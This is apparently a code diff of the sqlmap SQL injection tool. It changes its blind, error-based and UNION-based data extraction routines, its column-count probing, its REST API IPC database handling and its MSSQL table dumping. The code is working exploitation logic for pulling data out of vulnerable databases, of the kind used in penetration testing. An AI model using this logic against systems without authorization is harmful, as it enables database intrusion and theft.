@@ -187,8 +187,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
else:
|
||||
posValue = ord(hintValue[idx - 1])
|
||||
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
forgedPayload = agent.extractPayload(payload)
|
||||
forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
|
||||
@@ -121,7 +121,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
|
||||
payload = agent.payload(newValue=injExpression)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
|
||||
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
@@ -352,93 +352,94 @@ def errorUse(expression, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
if " ORDER BY " in expression and (stopLimit - startLimit) > SLOW_ORDER_COUNT_THRESHOLD:
|
||||
message = "due to huge table size do you want to remove "
|
||||
message += "ORDER BY clause gaining speed over consistency? [y/N] "
|
||||
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
if readInput(message, default="N", boolean=True):
|
||||
expression = expression[:expression.index(" ORDER BY ")]
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
if kb.dumpTable and (len(expressionFieldsList) < (stopLimit - startLimit) > CHECK_ZERO_COLUMNS_THRESHOLD):
|
||||
for field in expressionFieldsList:
|
||||
if _oneShotErrorUse("SELECT COUNT(%s) FROM %s" % (field, kb.dumpTable)) == '0':
|
||||
emptyFields.append(field)
|
||||
debugMsg = "column '%s' of table '%s' will not be " % (field, kb.dumpTable)
|
||||
debugMsg += "dumped as it appears to be empty"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def errorThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
output = _errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields, threadData.shared.showEta)
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if output and isListLike(output) and len(output) == 1:
|
||||
output = output[0]
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
with kb.locks.value:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, output))
|
||||
while threadData.shared.buffered and threadData.shared.lastFlushed + 1 == threadData.shared.buffered[0][0]:
|
||||
threadData.shared.lastFlushed += 1
|
||||
threadData.shared.value.append(threadData.shared.buffered[0][1])
|
||||
del threadData.shared.buffered[0]
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
runThreads(numThreads, errorThread)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
threadData.shared.value.extend(_[1] for _ in sorted(threadData.shared.buffered))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
value = _errorFields(expression, expressionFields, expressionFieldsList)
|
||||
|
||||
@@ -53,8 +53,8 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
query = agent.prefixQuery("ORDER BY %d" % cols, prefix=prefix)
|
||||
query = agent.suffixQuery(query, suffix=suffix, comment=comment)
|
||||
payload = agent.payload(newValue=query, place=place, parameter=parameter, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
return not any(re.search(_, page or "", re.I) and not re.search(_, kb.pageTemplate or "", re.I) for _ in ("(warning|error):", "order by", "unknown column", "failed")) and comparison(page, headers, code) or re.search(r"data types cannot be compared or sorted", page or "", re.I)
|
||||
|
||||
if _orderByTest(1) and not _orderByTest(randomInt()):
|
||||
infoMsg = "'ORDER BY' technique appears to be usable. "
|
||||
@@ -105,10 +105,10 @@ def _findUnionCharCount(comment, place, parameter, value, prefix, suffix, where=
|
||||
for count in xrange(lowerCount, upperCount + 1):
|
||||
query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, code = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
if not isNullValue(kb.uChar):
|
||||
pages[count] = page
|
||||
ratio = comparison(page, headers, getRatioValue=True) or MIN_RATIO
|
||||
ratio = comparison(page, headers, code, getRatioValue=True) or MIN_RATIO
|
||||
ratios.append(ratio)
|
||||
min_, max_ = min(min_, ratio), max(max_, ratio)
|
||||
items.append((count, ratio))
|
||||
@@ -187,7 +187,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
@@ -209,7 +209,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (page or "", listToStrValue(headers.headers if headers else None) or "")
|
||||
|
||||
if not all(_ in content for _ in (phrase, phrase2)):
|
||||
@@ -222,7 +222,7 @@ def _unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLO
|
||||
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, place=place, content=True, raise404=False)
|
||||
content = "%s%s".lower() % (removeReflectiveValues(page, payload) or "", \
|
||||
removeReflectiveValues(listToStrValue(headers.headers if headers else None), \
|
||||
payload, True) or "")
|
||||
|
||||
@@ -81,7 +81,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False):
|
||||
payload = agent.payload(newValue=query, where=where)
|
||||
|
||||
# Perform the request
|
||||
page, headers = Request.queryPage(payload, content=True, raise404=False)
|
||||
page, headers, _ = Request.queryPage(payload, content=True, raise404=False)
|
||||
|
||||
incrementCounter(PAYLOAD.TECHNIQUE.UNION)
|
||||
|
||||
@@ -284,126 +284,127 @@ def unionUse(expression, unpack=True, dump=False):
|
||||
value = [] # for empty tables
|
||||
return value
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
if isNumPosStrValue(count) and int(count) > 1:
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
try:
|
||||
threadData.shared.limits = iter(xrange(startLimit, stopLimit))
|
||||
except OverflowError:
|
||||
errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit)
|
||||
errMsg += "with switch '--fresh-queries'"
|
||||
raise SqlmapDataException(errMsg)
|
||||
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
numThreads = min(conf.threads, (stopLimit - startLimit))
|
||||
threadData.shared.value = BigArray()
|
||||
threadData.shared.buffered = []
|
||||
threadData.shared.counter = 0
|
||||
threadData.shared.lastFlushed = startLimit - 1
|
||||
threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit))
|
||||
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
if stopLimit > TURN_OFF_RESUME_INFO_LIMIT:
|
||||
kb.suppressResumeInfo = True
|
||||
debugMsg = "suppressing possible resume console info because of "
|
||||
debugMsg += "large number of rows. It might take too long"
|
||||
logger.debug(debugMsg)
|
||||
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
try:
|
||||
def unionThread():
|
||||
threadData = getCurrentThreadData()
|
||||
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
while kb.threadContinue:
|
||||
with kb.locks.limit:
|
||||
try:
|
||||
valueStart = time.time()
|
||||
threadData.shared.counter += 1
|
||||
num = threadData.shared.limits.next()
|
||||
except StopIteration:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
field = expressionFieldsList[0]
|
||||
elif Backend.isDbms(DBMS.ORACLE):
|
||||
field = expressionFieldsList
|
||||
else:
|
||||
field = None
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
|
||||
limitedExpr = agent.limitQuery(num, expression, field)
|
||||
output = _oneShotUnionUse(limitedExpr, unpack, True)
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
|
||||
if not kb.threadContinue:
|
||||
break
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
|
||||
if output:
|
||||
with kb.locks.value:
|
||||
if all(_ in output for _ in (kb.chars.start, kb.chars.stop)):
|
||||
items = parseUnionPage(output)
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
if isListLike(items):
|
||||
# in case that we requested N columns and we get M!=N then we have to filter a bit
|
||||
if len(items) > 1 and len(expressionFieldsList) > 1:
|
||||
items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)]
|
||||
items = [_ for _ in flattenValue(items)]
|
||||
if len(items) > len(expressionFieldsList):
|
||||
filtered = OrderedDict()
|
||||
for item in items:
|
||||
key = re.sub(r"[^A-Za-z0-9]", "", item).lower()
|
||||
if key not in filtered or re.search(r"[^A-Za-z0-9]", item):
|
||||
filtered[key] = item
|
||||
items = filtered.values()
|
||||
items = [items]
|
||||
index = None
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, items))
|
||||
else:
|
||||
index = None
|
||||
if threadData.shared.showEta:
|
||||
threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter)
|
||||
for index in xrange(1 + len(threadData.shared.buffered)):
|
||||
if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num:
|
||||
break
|
||||
threadData.shared.buffered.insert(index or 0, (num, None))
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
|
||||
items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter)
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
|
||||
while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH):
|
||||
threadData.shared.lastFlushed, _ = threadData.shared.buffered[0]
|
||||
if not isNoneValue(_):
|
||||
threadData.shared.value.extend(arrayizeValue(_))
|
||||
del threadData.shared.buffered[0]
|
||||
dataToStdout("%s\n" % status)
|
||||
|
||||
if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta:
|
||||
_ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items
|
||||
status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_))
|
||||
runThreads(numThreads, unionThread)
|
||||
|
||||
if len(status) > width:
|
||||
status = "%s..." % status[:width - 3]
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
dataToStdout("%s\n" % status)
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
runThreads(numThreads, unionThread)
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if conf.verbose == 1:
|
||||
clearConsoleLine(True)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
abortedFlag = True
|
||||
|
||||
warnMsg = "user aborted during enumeration. sqlmap "
|
||||
warnMsg += "will display partial output"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
finally:
|
||||
for _ in sorted(threadData.shared.buffered):
|
||||
if not isNoneValue(_[1]):
|
||||
threadData.shared.value.extend(arrayizeValue(_[1]))
|
||||
value = threadData.shared.value
|
||||
kb.suppressResumeInfo = False
|
||||
|
||||
if not value and not abortedFlag:
|
||||
output = _oneShotUnionUse(expression, unpack)
|
||||
|
||||
@@ -70,7 +70,7 @@ class Database(object):
|
||||
self.cursor = None
|
||||
|
||||
def connect(self, who="server"):
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None)
|
||||
self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False)
|
||||
self.cursor = self.connection.cursor()
|
||||
logger.debug("REST-JSON API %s connected to IPC database" % who)
|
||||
|
||||
@@ -232,34 +232,26 @@ class StdDbOut(object):
|
||||
# Ignore all non-relevant messages
|
||||
return
|
||||
|
||||
output = conf.databaseCursor.execute(
|
||||
"SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?",
|
||||
(self.taskid, content_type))
|
||||
output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type))
|
||||
|
||||
# Delete partial output from IPC database if we have got a complete output
|
||||
if status == CONTENT_STATUS.COMPLETE:
|
||||
if len(output) > 0:
|
||||
for index in xrange(len(output)):
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?",
|
||||
(output[index][0],))
|
||||
conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type, jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
if kb.partRun:
|
||||
kb.partRun = None
|
||||
|
||||
elif status == CONTENT_STATUS.IN_PROGRESS:
|
||||
if len(output) == 0:
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)",
|
||||
(self.taskid, status, content_type,
|
||||
jsonize(value)))
|
||||
conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value)))
|
||||
else:
|
||||
new_value = "%s%s" % (dejsonize(output[0][2]), value)
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?",
|
||||
(jsonize(new_value), output[0][0]))
|
||||
conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0]))
|
||||
else:
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)",
|
||||
(self.taskid, str(value) if value else ""))
|
||||
conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else ""))
|
||||
|
||||
def flush(self):
|
||||
pass
|
||||
@@ -270,17 +262,13 @@ class StdDbOut(object):
|
||||
def seek(self):
|
||||
pass
|
||||
|
||||
|
||||
class LogRecorder(logging.StreamHandler):
|
||||
def emit(self, record):
|
||||
"""
|
||||
Record emitted events to IPC database for asynchronous I/O
|
||||
communication with the parent process
|
||||
"""
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)",
|
||||
(conf.taskid, time.strftime("%X"), record.levelname,
|
||||
record.msg % record.args if record.args else record.msg))
|
||||
|
||||
conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg))
|
||||
|
||||
def setRestAPILog():
|
||||
if conf.api:
|
||||
@@ -555,16 +543,11 @@ def scan_data(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all data from the IPC database for the taskid
|
||||
for status, content_type, value in DataStore.current_db.execute(
|
||||
"SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
json_data_message.append(
|
||||
{"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})
|
||||
|
||||
# Read all error messages from the IPC database
|
||||
for error in DataStore.current_db.execute(
|
||||
"SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC",
|
||||
(taskid,)):
|
||||
for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_errors_message.append(error)
|
||||
|
||||
logger.debug("[%s] Retrieved scan data and error messages" % taskid)
|
||||
@@ -591,10 +574,7 @@ def scan_log_limited(taskid, start, end):
|
||||
end = max(1, int(end))
|
||||
|
||||
# Read a subset of log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
("SELECT time, level, message FROM logs WHERE "
|
||||
"taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"),
|
||||
(taskid, start, end)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages subset" % taskid)
|
||||
@@ -613,8 +593,7 @@ def scan_log(taskid):
|
||||
return jsonize({"success": False, "message": "Invalid task ID"})
|
||||
|
||||
# Read all log messages from the IPC database
|
||||
for time_, level, message in DataStore.current_db.execute(
|
||||
"SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):
|
||||
json_log_messages.append({"time": time_, "level": level, "message": message})
|
||||
|
||||
logger.debug("[%s] Retrieved scan log messages" % taskid)
|
||||
|
||||
@@ -170,18 +170,44 @@ class Entries:
|
||||
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
if Backend.isDbms(DBMS.MSSQL):
|
||||
query = rootQuery.blind.count % table
|
||||
query = agent.whereQuery(query)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
entries = zip(*[entries[colName] for colName in colList])
|
||||
count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
|
||||
if isNumPosStrValue(count):
|
||||
try:
|
||||
indexRange = getLimitRange(count, plusOne=True)
|
||||
|
||||
for index in indexRange:
|
||||
row = []
|
||||
for column in colList:
|
||||
query = rootQuery.blind.query3 % (column, column, table, index)
|
||||
query = agent.whereQuery(query)
|
||||
value = inject.getValue(query, blind=False, time=False, dump=True) or ""
|
||||
row.append(value)
|
||||
|
||||
entries.append(row)
|
||||
|
||||
except KeyboardInterrupt:
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not entries and not kb.dumpKeyboardInterrupt:
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
